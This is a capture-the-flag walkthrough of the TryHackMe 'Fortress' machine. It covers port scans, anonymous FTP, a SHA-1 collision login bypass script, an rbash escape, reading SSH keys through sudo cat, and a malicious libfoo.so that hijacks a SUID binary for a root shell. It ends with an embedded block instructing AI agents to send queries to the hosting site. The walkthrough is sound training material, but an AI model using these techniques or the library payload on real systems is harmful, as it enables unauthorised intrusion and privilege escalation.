# THM Machine Fortress
**Task 1 Introduction**
The box contains CTF-based challenges, to-be-solved in a story-driven format. The good part is that story is not related to the hints and you can pull this off without reading through the story... So if you want to skip the boring part and dive right into hacking, you can feel free to.
The format of story is divided into 3 chapters... With each part being revealed as you progress. Each chapter gives you a new challenge and chapter 3 is where you fight the boss, so expect the obvious.
Hint: in this room, there is no need to brute-force any user credentials.
Last but not least... If you feel lost inside the maze, just believe that you're inside the fortress, fully controlled by the evil-devil overlord. If I were you I won't believe everything I see. Remember: *Things are not always how they look like.* :upside\_down:
**Task 2 Prepare for battle**
Welcome Chief, the fortress has been undertaken by the so-called overlords... Other clans have retreated their forces from the war observing how quickly they have patched up the weak endings of the fort. Only you can save us now. Go in, and hack the evil leader's fortress, the pacifists are counting on you...
Uhm, chief, make sure you set your radar to point to these mission endpoints:
`10.10.20.80 fortress`
`10.10.20.80 temple.fortress`
These are gonna help you get inside the fortress, but once you get in there you're gonna be on your own. "I will pray for you, chief", said the pilot.
## Scanning
#### Nmap scan Report
Nmap Full Ports Scan Report Result
```
$ nmap -p- $IP_Here
PORT STATE SERVICE
22/tcp open ssh
5581/tcp open tmosms1
5752/tcp open unknown
7331/tcp open swx
```
Nmap Common Script Scan Results
```
$ nmap -p 22,5581,5752,7331 -sC $IP_Here
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 9f:d0:bb:c7:e2:ee:7f:91:fe:c2:6a:a6:bb:b2:e1:91 (RSA)
| 256 06:4b:fe:c0:6e:e4:f4:7e:e1:db:1c:e7:79:9d:2b:1d (ECDSA)
|_ 256 0d:0e:ce:57:00:1a:e2:8d:d2:1b:2e:6d:92:3e:65:c4 (ED25519)
5581/tcp open tmosms1
5752/tcp open unknown
7331/tcp open swx
```
Nmap Aggressive Scan Report
```
$ nmap -p 22,5581,5752,7331 -A $IP_Here
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f:d0:bb:c7:e2:ee:7f:91:fe:c2:6a:a6:bb:b2:e1:91 (RSA)
| 256 06:4b:fe:c0:6e:e4:f4:7e:e1:db:1c:e7:79:9d:2b:1d (ECDSA)
|_ 256 0d:0e:ce:57:00:1a:e2:8d:d2:1b:2e:6d:92:3e:65:c4 (ED25519)
5581/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 305 Jul 25 20:06 marked.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.186.33
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
5752/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, LANDesk-RC, LPDString, RTSPRequest, SIPOptions, X11Probe:
| Chapter 1: A Call for help
| Username: Password:
| Kerberos, LDAPBindReq, LDAPSearchReq, NCP, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie:
| Chapter 1: A Call for help
|_ Username:
7331/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
```
#### Conclusion
1. **Total Open Ports:** `4`
2. **Port Number:** `22`, `5581`, `5752`,`7331`
3. **Services:** `ssh`, `ftp`, `Unknown`, `http`
4. **Services Versions:** `OpenSSH 7.2p2`, `vsftpd 3.0.3`, `Unknown`, `Apache httpd 2.4.18`
5. **Operating System:** `Ubuntu`
## Enumeration
1. **Ftp Enumeration**
From the Nmap Aggressive Scan Report, we can see ftp has anonymous login allowed so we can login to the ftp server using an `anonymous` account using the following command
```shell
$ ftp $IpAdd_Here 5581
Name: anonymous
Password:
```
**Note: In an anonymous account, you don't need to give a password just press enter there or leave him empty**
When we use the `ls -al` command there we can see there are two files there one is `marked.txt` and the other is hidden and its name is `.file`
We can download that file using the `get` command there like follows
```bash
$ get .file marked.txt
```
The above command downloads those files to our current directory where we open the ftp server. So now we have that files we can see the content of that files so now we can examine that files to see what is in there `.file` don't have any extension there so we can use the `file` command on it to see what the type of file is that like follows
```bash
$ file .file
```
This shows us the file type of the `.file` file and the other file has the extension `.txt`, which means that file is a text file so we can see its content using the `cat` command
The text file has text on it but `.file` is a `python 2.7 byte-complied` file which means that file is a compiled files of `python2` and we can try to `decompile` it so we can see its source code for getting some useful information. We can use [uncompyle2](https://github.com/wibiti/uncompyle2) that `decompiles` that code, we can do this with the following command
```bash
$ git clone https://github.com/wibiti/uncompyle2
$ cd uncompyle2
$ sudo ./setup.py install
$ ./scripts/uncompyle2 ../.file > decompiled.py
```
This will decompile that code and store its output to the file name `decompiled_backdoor.py`
After Decompiling we can see there is `usern` and `passw` variable that have `bytes_to_long` encoded data, we can decode that values to get the `usern` and `passw` value, we know they uses `bytes_to_long` utility to encode it so we can decode it using `long_to_bytes` with the following `python3` code
```python
from Crypto.Util.number import long_to_bytes
username = "232340432076717036154994"
password = "10555160959732308261529999676324629831532648692669445488"
print(long_to_bytes((usernameusername)))
print(long_to_bytes((passwordpassword)))
```
After running that code we got the username and password values if everything run fine
```Credentials
Username: 1337-h4x0r
Password: n3v3r_g0nn4_g1v3_y0u_up
```
2. **Port 5752 Enumeration**
So there is some service running on port 5752 but we could not get what type of service is running on that port so to get that we could use `netcat` or `nc` to connect to that service that way we probably find something interesting. To connect to that we can use the following command
```shell
$ nc $IpAdd_Here 5752
```
When we do that we see the following output
So there we see we need a `username` and `password` and we find credentials on ftp enumeration we can use that credentials there and see if they accept those credentials or not.
And they do accept it and we got some output `t3mple_0f_y0ur_51n5` they may be some kind of secret string that may use in some other place.
3. **HTTP Enumeration**
Above we do an enumeration of the service that got us some information. Now we enumerate the web server that has a big attack surface. In enumeration, we found out that Target is using an Apache web server. When we visit the main page of the site we confirm that also because they show us Apache default web page.
So Now start finding hidden directories the target contained in the server. To find that we can use the following command
```shell
$ ffuf -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://10.10.127.125:7331/FUZZ -e .php,.html,.js,.css -ic
```
* `-w` is use to specify wordlist
* `:FUZZ` is the keyword for `ffuf`
* `-u` is used to specify the target URL
* `FUZZ` is the keyword for `ffuf` to specify which place they have to fuzz
* `-e` is used to specify the extension
* `-ic` is used to ignore comments
and the output has the following things in it
```ffuf
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
assets [Status: 301, Size: 322, Words: 20, Lines: 10]
private.php [Status: 200, Size: 0, Words: 1, Lines: 1]
troll.html [Status: 200, Size: 199, Words: 11, Lines: 12]
```
There we see `index.html` that we see above the `Apache` default page, `assets` is a directory that we don't access, `private.php` is a page that doesn't have any content in it they are just a blank page or requires some additional things. And `troll.html` is a web page we can access but when we go there they show just a blank page with a black background they have some content in it because from above we see they have size `199` so we can view its source code and they are like the following.
there we see a message **This is not so easy** and there is also a link of **assests/style.css** that has some base64 encoded message. When we decode that message using the following command syntax
```shell
$ echo 'Base64 string here' | base64 -d
```
Output is like this
There we see some kind of ancient words that I don't know their purpose. One thing to note the word `COLLIDING` is in upper case.
That's all we find right now and they are not enough. We find a string from service running on port `5752`. Maybe they are HTTP hidden directories we can find this also using `ffuf` we have to make a file that has a string we find from that service and use that as a wordlist like follows
```shell
$ ffuf -u http://10.10.238.81:7331/FUZZ -w tample.txt:FUZZ -e .php,.html,.js,.css
```
And the output is like following
So this is a hidden directory with two extensions `html` and `php`. The `t3mple_0f_y0ur_51n5.html` is looks like the following.
Their source code has an interesting thing. They comment out a `php` code there
Let's see `t3mple_0f_y0ur_51n5.php` on page. That page has nothing just a black background when I see its source code that also has some interesting thing
They commented some login forum that uses the GET Request Method with the parameters `user` that has a username and `pass` that has a password.
After reading the `php` code we came to know They get input from the user about `username` and `password` and save it in a variable `test1` and `test2` and encode it in hex using `bin2hex` and compare that using `if-else` statement but we focus on the following code conditions.
```php
else if (sha1($test1) === sha1($test2)) {
print "
'Private Spot: '$spot
";
}
```
So basically they compare the `test1` variable with `test2` if they have the same sha1 hash then they will print some private spot information. We cannot pass the same `username` and `password` string because of the following check in the code.
```php
if ($test1 == $test2) {
print 'You can't cross the gates of the temple, GO AWAY!!.';
}
```
Above we see we have to pass different username and password values but those values should have the same sha1 hash. As far as I know, **Hashing is a thing that will generate a fixed length of characters or string called digest by evaluating some mathematical operations on the file and two different files or data don't have the same hash because the mathematical operation gives a different result based on data**. That's the rule for hashing so after googling "Can the different files have the same SHA1 hash". I came to know yes because SHA1 has a vulnerability name hash collision in which two different files can have the same sha1 hash. When googling more about it I found that the video is useful to learn more about the hash collision attack
[Hash Collision Attack](https://www.youtube.com/watch?v=Zl1TZJGfvPo)
So now I know why the**/assets/style.css** file message writes **COLLIDING** in upper case letters
Now we have to send two different usernames and password strings as GET parameters of username and password they have a length in between `500` and `600` because of the following conditions.
```php
else if(strlen($test2) <= 500 and strlen($test1) <= 600){
print "
Nah, babe that ain't gonna work
";
}
```
Keep that in mind, we have to send small hash collision strings that have a small size but have the same sha1 hash after more Googling I found this site useful things related to hash collision attacks.
The above site has two message files that have the same hash.
After downloading that file it was found that files have the same sha1 hash and also have a small size.
.
Now we have the files that can be used but there is a problem with how we send that files to the server with username and password parameters To solve that problem I use the following `python3` code that uses `requests` the library to send the request with that conditions.
```python
import requests
import urllib.request, urllib.error, urllib.parse
username = urllib.request.urlopen("https://sha-mbles.github.io/messageA").read();
password = urllib.request.urlopen("https://sha-mbles.github.io/messageB").read();
r = requests.get('http://10.10.238.81:7331/t3mple_0f_y0ur_51n5.php', params={'user': username, 'pass': password});
print(r.text)
```
In that code, we request the `messageA` and `messageB` files with their complete URL from [sha-mbles.io](https://sha-mbles.github.io/) and read those files and store their content to the variable name `username` and `password` and send it to the server.
With the GET parameter `user` for username and `pass` for password and when that code runs they show us the following output
They give us a directory name that has the following content.
There they have some messages for `j4x0n` and `h4rdy` private key. That key is use to login to the system using ssh for the `h4rdy` user. We can copy that key in a file and make that private key with the permissions that only we can read it using the following commands
```shell
$ echo 'private key here' > h4rdy_rsa
$ chmod 600 h4rdy_rsa
```
So now we can get initial access to the system
## Initial Access
As we have the `h4rdy` ssh private key so we can login to its user using the following command
```shell
$ ssh -i h4rdy_rsa h4rdy@10.10.238.81
```
And now we got the initial access
when we use the `ls` command there we got the following errors
This user has a default shell set to `rbash` which is a restricted shell that restricts us to run some specified commands only but they have some bypasses when googling it and found the following method useful.
Following the above steps we can bypass `rbash` restriction and login with a low-privilegenormal shell using the following command.
```shell
$ ssh -i h4rdy_rsa h4rdy@10.10.110.53 -t "bash --noprofile"
```
This gives us regular `bash` but they don't have any `PATH` or `env` set so we have to do this on our own.
There we use the following command to add the `PATH`
```shell
$ export PATH=/bin:/usr/bin
```
This adds the `PATH` so now we can use the commands as we do
## Privilege Escalation
Now we have low privilege access the next step is to do Privilege escalation to get higher privilege in the system. For that, we can start with the `sudo -l` command and they show us the following output
```shell
Matching Defaults entries for h4rdy on Fortress:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User h4rdy may run the following commands on Fortress:
(j4x0n) NOPASSWD: /bin/cat
```
The above result shows the user `h4rdy` can use the `cat` command with `no password` as a `j4x0n` user and that's nice for us because if `h4rdy` don't have a `user.txt` flag `j4x0n` must have that file. Knowing that we can use `cat` command to read `user.txt` flag
```shell
$ sudo -u j4x0n cat /home/j4x0n/user.txt
```
So we can successfully see that flag that only the `j4x0n` user can read. We can also read the `j4x0n` user ssh private key with the following command.
```shell
$ sudo -u j4x0n cat /home/j4x0n/.ssh/id_rsa
```
Now we also have the `j4x0n` private key that also is used to login to its account. Using the following command steps
```shell
$ echo 'private key here' > j4x0n_rsa
$ chmod 600 j4x0n_rsa
```
```shell
$ ssh -i j4x0n_rsa j4x0n@10.10.238.81
```
We successfully login to `j4xon` user this is horizontal privilege escalation.
Now we can use `sudo -l` also for easy privilege escalation vectors but they required a password that we don't have at this time. we can use `find` command to find a system `SUID` binaries to know if there are any binaries that are using `SUID` bitset using the following command.
```shell
$ find / -perm /4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 615496 Jul 25 21:21 /usr/local/bin/sudo
-rwsr-xr-x 1 root root 14864 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 May 27 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 12 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84120 Apr 10 2019 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 54256 Mar 27 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 20 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 32944 Mar 27 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 40432 Mar 27 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 39904 Mar 27 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 Mar 27 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 Mar 27 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 23376 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 71824 Mar 27 2019 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsrwxr-x 1 root root 16696 Jul 26 12:55 /opt/bt
-rwsr-xr-x 1 root root 44680 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 Jan 27 2020 /bin/umount
-rwsr-xr-x 1 root root 44168 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 40152 Jan 27 2020 /bin/mount
-rwsr-xr-x 1 root root 40128 Mar 27 2019 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 1000608 Apr 21 23:44 /sbin/ldconfig.real
```
There we see lots of binary that has `SUID` bit set but they are basic to `linux` system except for `/opt/bt` that's a new binary that is not come by default in `linux` Operating systems. when I run it to find what it does it's kind of a booby trap they show output like this
```shell
Root Shell Initialized...
Exploiting kernel at super illuminal speeds...
Getting Root...
Bwahaha, You just stepped into a booby trap XP
```
After that, they crash my terminal with some junk and I cannot do anything there now. I have to close my terminal and open a new one and login again. I use `strings` commands on it like the following.
```shell
$ j4x0n@fortress:~$ strings /opt/bt
/lib64/ld-linux-x86-64.so.2
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
puts
sleep
__cxa_finalize
__libc_start_main
libfoo.so
libc.so.6
GLIBC_2.2.5
u/UH
[]A\A]A^A_
Root Shell Initialized...
Exploiting kernel at super illuminal speeds...
Getting Root...
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
main.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
_edata
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
sleep@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
```
In the above output, we see some file name `libfoo.so`, and`libc.so.6` that are linked files to that binary. I use the find command to know its location.
```shell
$ find / -name libfoo.so -exex ls -al {} \; 2>/dev/null
```
From the above command result, I came to know that file is owned by `j4x0n` user. The `/bin/bt` binary has an `SUID` permission and they are using a linked library that is owned by our user sounds interesting. If we see `hacktrix` privilege escalation notes we see there are methods related to this by following that I made a malicious `libfoo.so` with the following steps.
* First, we have to make a file name `libfoo.c` with the following code
```c
#include
#include
#include
int foo() {
setgid(0);
setuid(0);
system("/bin/bash");
}
```
* After that, we have to compile that file with the following command
```shell
$ gcc -fPIC -shared -o libfoo.so libfoo.c
```
They give us the file `libfoo.so` with malicious code
Now we can copy our malicious binary in the actual location using the following command
```shell
$ cp /home/j4x0n/libfoo.so /usr/lib
```
After that, we run that binary and they give us a root shell.
Now read the `root` flag using the following command and solve the room.
```bash
# cat /root/root.txt
```
***
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://w4h33d.gitbook.io/hack-notes/writeups/tryhackme/thm-machine-fortress.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
